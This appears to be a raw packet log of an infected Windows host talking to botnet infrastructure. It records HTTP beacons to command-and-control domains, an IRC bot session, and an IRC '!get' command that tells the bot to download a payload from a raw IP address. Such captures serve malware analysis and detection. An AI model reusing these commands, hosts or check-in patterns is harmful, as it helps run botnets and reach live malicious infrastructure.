VICTIM:  	GET /gt_ky.php HTTP/1.1User-Agent: Windows 5.0 (2195); DMCP ver 2Host: wrsavn.kastora.com 
ATTACKER:	GET /gt_bd.php?srky=2ea14100559c3f6985d0eeab4726a12d&version=92_avn&GUID=398F11E4B0F222103A8638257AF80CE3C6832B0F329F39516FF917E3C2832212339B385673B4&cmd=&p=&i=&x=194437&tst=Am,Am HTTP/1.1User-Agent: Windows 5.0 (2195); DMCP ver 2Host: wrsavn.kastora.com 
ATTACKER:	GET /get.php?p=a537119c47192bc08952189ae8782f08&cb2=e1f353f8a13fd7b38314d6b8be074641 HTTP/1.1User-Agent: Windows 5.0 (2195); DMCP ver 2Host: dl2.bundlext.com:8080 
VICTIM:  	NICK midadpoiUSER x020500 . . :- 
VICTIM:  	Service Pack 2JOIN &virtu 
ATTACKER:	GET /ack.php?version=16&uid=F07BA028-0C81-1033-0417-060000000001&status=OK HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: b152.bundlext.comConnection: Keep-Alive 
ATTACKER:	PING :i 
ATTACKER:	:* PRIVMSG midadpoi :!get http:/85.114.141.207/DONT-TOUCH/wr.jpgPING :i 
ATTACKER:	GET /DONT-TOUCH/wr.jpg HTTP/1.0User-Agent: DownloadHost: 85.114.141.207Pragma: no-cache 
ATTACKER:	PONG :i 
VICTIM:  	JOIN &virtu 
ATTACKER:	GET /get_frst.php?uid=F07BA028-0C81-1033-0417-060000000001 HTTP/1.0User-Agent: Windows 5.0 (2195); DMCP ver 2Host: wrsnav.wwlax.com 
ATTACKER:	GET /rp.txt?uid=F07BA028-0C81-1033-0417-060000000001&iam=I&st=Ok HTTP/1.0Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: bugreport.waverevenue.comConnection: Keep-Alive